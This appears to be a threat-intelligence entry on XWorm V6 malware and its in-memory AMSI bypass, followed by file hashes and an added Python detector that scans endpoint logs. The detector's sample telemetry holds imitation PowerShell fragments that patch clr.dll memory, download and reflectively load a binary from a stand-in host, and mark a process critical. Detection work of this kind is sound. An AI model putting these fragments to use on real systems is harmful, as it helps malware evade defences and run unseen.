XWorm V6: Advanced Evasion and AMSI Bypass Capabilities Revealed

July 30, 2025, 7:20 p.m.

Description

A new version of the XWorm malware (version 6.0) has been identified with additional persistence and evasion features. The infection chain begins with a VBScript that downloads and executes a PowerShell script. That script bypasses AMSI by patching CLR.DLL in memory, then downloads the XWorm binary and loads it without writing it to disk. The new version can also mark its own process as a critical process, which requires administrative privileges to set and means that terminating the process crashes the system, so it cannot simply be killed. It adds anti-analysis checks as well: it exits when run on Windows XP and when it detects that it is executing in a data center or on a hosting provider's infrastructure. Execution remains entirely in memory, and the evasion techniques of earlier versions are retained.
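
The chain above (script host launching PowerShell, a script that patches CLR.DLL in memory and reflectively loads a downloaded binary, and a process that marks itself critical) can be turned into endpoint-log detections. The following is an added example written for this page, not code from the report or from any XWorm analysis. It runs heuristic rules over constructed records shaped like Sysmon process-creation events and PowerShell script-block (4104) events; the field names, sample script text and regular expressions are assumptions made for illustration, not indicators taken from the report.

```python
"""Heuristic detection of the XWorm V6 infection chain described on this page.

Added example, not the report's own tooling. Event shapes follow Sysmon
Event ID 1 (process creation) and PowerShell Event ID 4104 (script block),
but every field name, sample value and pattern here is an assumption.
"""
import re

# Stage 1: a VBScript host spawning PowerShell.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Stage 2/3: script-block content. Patterns are assumed, not signatures from the report.
SUSPICIOUS_PATTERNS = [
    # Classic AMSI bypasses name the AMSI API directly.
    ("amsi_reference", re.compile(r"amsi(scanbuffer|initialize|utils)?", re.I)),
    # A CLR.DLL in-memory patch needs the module plus a memory-write primitive.
    ("clr_in_memory_patch",
     re.compile(r"clr\.dll.*(VirtualProtect|WriteProcessMemory|Marshal\]::Copy)", re.I | re.S)),
    # Download followed by reflective load keeps the payload off disk.
    ("download_and_load",
     re.compile(r"(DownloadData|DownloadString|Invoke-WebRequest).*Assembly\]::Load", re.I | re.S)),
    # Marking the process critical so that killing it crashes the system.
    ("critical_process", re.compile(r"RtlSetProcessIsCritical|NtSetInformationProcess", re.I)),
]


def basename(path):
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect_process_events(events):
    """Flag PowerShell started by a script host (VBScript first stage)."""
    alerts = []
    for e in events:
        if basename(e.get("ParentImage", "")) in SCRIPT_HOSTS and basename(e.get("Image", "")) in POWERSHELL:
            alerts.append({"rule": "vbscript_spawns_powershell",
                           "pid": e["ProcessId"], "cmdline": e.get("CommandLine", "")})
    return alerts


def detect_script_blocks(blocks):
    """Flag script blocks matching any pattern; record which patterns hit."""
    alerts = []
    for b in blocks:
        hits = [name for name, rx in SUSPICIOUS_PATTERNS if rx.search(b["ScriptBlockText"])]
        if hits:
            alerts.append({"rule": "suspicious_script_block", "script_id": b["ScriptBlockId"], "hits": hits})
    return alerts


# Constructed sample telemetry (not real events).
SAMPLE_PROCESS_EVENTS = [
    {"ProcessId": 4120, "ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -ep bypass -c ..."},
    {"ProcessId": 4300, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
    {"ProcessId": 4410, "ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
]

SAMPLE_SCRIPT_BLOCKS = [
    # Mimics the in-memory CLR.DLL patch plus download-and-load; never mentions AMSI.
    {"ScriptBlockId": "blk-1", "ScriptBlockText": r"""
$m = (Get-Process -Id $PID).Modules | Where-Object { $_.ModuleName -eq 'clr.dll' }
[Win32]::VirtualProtect($addr, 8, 0x40, [ref]$old)
[System.Runtime.InteropServices.Marshal]::Copy($patch, 0, $addr, $patch.Length)
$b = (New-Object Net.WebClient).DownloadData('http://example.invalid/x.bin')
[System.Reflection.Assembly]::Load($b).EntryPoint.Invoke($null, $null)
"""},
    # Benign administrative use of the same module name.
    {"ScriptBlockId": "blk-2", "ScriptBlockText": r"Get-Item C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll | Select-Object Length"},
    # Mimics the critical-process step.
    {"ScriptBlockId": "blk-3", "ScriptBlockText": r"[Ntdll]::RtlSetProcessIsCritical(1, [IntPtr]::Zero, 0)"},
]


def run_sample():
    """Run both detectors over the constructed telemetry."""
    return detect_process_events(SAMPLE_PROCESS_EVENTS), detect_script_blocks(SAMPLE_SCRIPT_BLOCKS)


if __name__ == "__main__":
    for alert in (a for group in run_sample() for a in group):
        print(alert)
```

Note that the first script block is caught by the `clr_in_memory_patch` and `download_and_load` rules but never by `amsi_reference`: a bypass that patches CLR.DLL has no need to name the AMSI API, so rules keyed only on the string "amsi" would miss this variant. The benign block that merely reads clr.dll's size produces no hit, which is why the patch rule requires a memory-write primitive alongside the module name.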

Date

  • Created: July 30, 2025, 7:01 p.m.
  • Published: July 30, 2025, 7:01 p.m.
  • Modified: July 30, 2025, 7:20 p.m.

Indicators

  • e73f48fe634a0c767bd596bbd068a13be7465993633fd61ccda717a474ee2db2
  • 9dd4902099e23c380596e7061482560866e103d2a899b84e0b6ff98c44c494e4
  • 4648ce5e4ce4b7562a7828eb81f830d33ab0484392306bc9d3559a42439c8558
  • c4c533ddfcb014419cbd6293b94038eb5de1854034b6b9c1a1345c4d97cdfabf

Attack Patterns